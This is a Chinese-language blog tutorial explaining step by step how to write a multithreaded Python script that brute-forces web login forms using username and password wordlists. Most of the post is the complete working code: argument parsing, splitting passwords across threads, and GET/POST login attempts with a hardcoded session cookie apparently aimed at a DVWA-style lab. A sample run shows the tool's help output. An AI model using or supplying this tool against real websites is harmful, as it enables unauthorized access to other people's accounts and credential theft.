美文网首页
python爆破密码账号

python爆破密码账号

作者: pigdaqiang | 来源:发表于2020-01-21 20:36 被阅读0次

    账号密码爆破

    大致流程

    graph TD
    st[程序开始执行] --> op(程序各项参数说明)
    op --> op1(requests编写一个扫描模块) 
    op1 --> op2(对读取到的密码分配给指定的线程 注意向上取整)
    op2 --> op3(读取name,调用多线程模块实现多线程)
    op3 --> op4[程序结束]
    

    根据程序需要选用optparse来实现程序对于参数的接受和程序--help功能的实现, math模块实现多线程的时候程序向上取整, 使password全部被分配到线程里面, 调用requests实现post和get类型的请求, threading模块实现多线程功能.

    1. 导入相应的模块

      import optparse
      import math
      import threading
      import requests
      
    2. 程序说明(--help信息)

      parser = optparse.OptionParser()
      parser.usage = "web_burte_command.py -u url -n user_file -p pass_file -t num"
      parser.add_option("-u", "--site", dest = "website", help = "website to test", action = "store", type = "string", metavar = "URL")
      parser.add_option("-n", "--namefile", dest = "namefile", help = "name from file", action = "store", type = "string", metavar = "NAMEFILE")
      parser.add_option("-p", "--passfile", dest = "passfile", help = "pass from file", action = "store", type = "string", metavar = "PASSFILE")
      parser.add_option("-t", "--threads", dest = "threads", help = "num of threads", action = "store", type = "string", metavar = "THREAD")
      (options, args) = parser.parse_args()
      
      
      ths = int(options.threads)
      pass_dic = options.passfile
      user_dic = options.namefile
      site = options.website
      
    3. requests实现扫描模块(注意爆破的时候是get类型还是post类型)

      def scan(payload):
          user = payload["username"]
          threads_pass_list = payload["pass_list"]
          for password in threads_pass_list:
              # r = requests.post(url = site, data = {"username":user, "password":password.strip(), "submit":"submit"}) # 根据实际情况修改相应的参数
              r = requests.get(url = site, params = {"username":user, "password":password.strip(), "Login":"Login"}, headers = {"Cookie":"security=high; security=high; PHPSESSID=lip25ut7pltp2nkjrgd68l9fq5"})
              print (str(len(r.text)) + "username: "+user+" ; "+"password : "+password + "\n")
      
    4. password分配到每个线程里面

      # 新建一个密码字典列表 [[],[],[]]
      pass_list = []
      result_num = 0 # 每个线程要读取的行数
      # 根据线程数确定每一项当中的行数,一个线程读取多少行密码
      # 第一步:确定pass的行数
      with open(pass_dic, "r") as f:
          temp_list = f.readlines()
          temp_thread_list = []
          num = len(temp_list)
          # 根据临时列表的项数除以线程数 得到每一线程中的项数
          result = num / ths
          # 第三步获取向上取整的行数math.ceil(num / ths)
          # if num % ths == 0:
          #     result = num / ths
          # else:
          result = math.ceil(num / ths)
          result_num = result
          flag = 0
          for line in temp_list:
              flag += 1
              temp_thread_list.append(line.strip()) # 去除换行
              if flag == result_num:
                  flag = 0
                  pass_list.append(temp_thread_list)
                  temp_thread_list = []
          pass_list.append(temp_thread_list)
      
    5. 读取name文件并且开启多线程功能

      # payload - > pass_list 结合用户名字典来进行确定
      # 使用线程列表
      ths_list = []
      with open(user_dic, "r") as f:
          user_list = f.readlines()
          for user in user_list:
              for pass_line in pass_list:
                  payload = {"username":user.strip(), "pass_list":pass_line}
                  ths_list.append(threading.Thread(target = scan, args = (payload, )))
      for th in ths_list:
          th.start()
      
    6. 程序试运行

      pig@deep:~/Desktop/web_pass_burte$ ls
      name.txt  pass.txt  web_burte_command.py
      pig@deep:~/Desktop/web_pass_burte$ python3 web_burte_command.py --help
      Usage: web_burte_command.py -u url -n user_file -p pass_file -t num
      
      Options:
        -h, --help            show this help message and exit
        -u URL, --site=URL    website to test
        -n NAMEFILE, --namefile=NAMEFILE
                              name from file
        -p PASSFILE, --passfile=PASSFILE
                              pass from file
        -t THREAD, --threads=THREAD
                              num of threads
      pig@deep:~/Desktop/web_pass_burte$
      

    pass.txt
    name.txt

    个人博客

    相关文章

      网友评论

          本文标题:python爆破密码账号

          本文链接:https://www.haomeiwen.com/subject/xoaezctx.html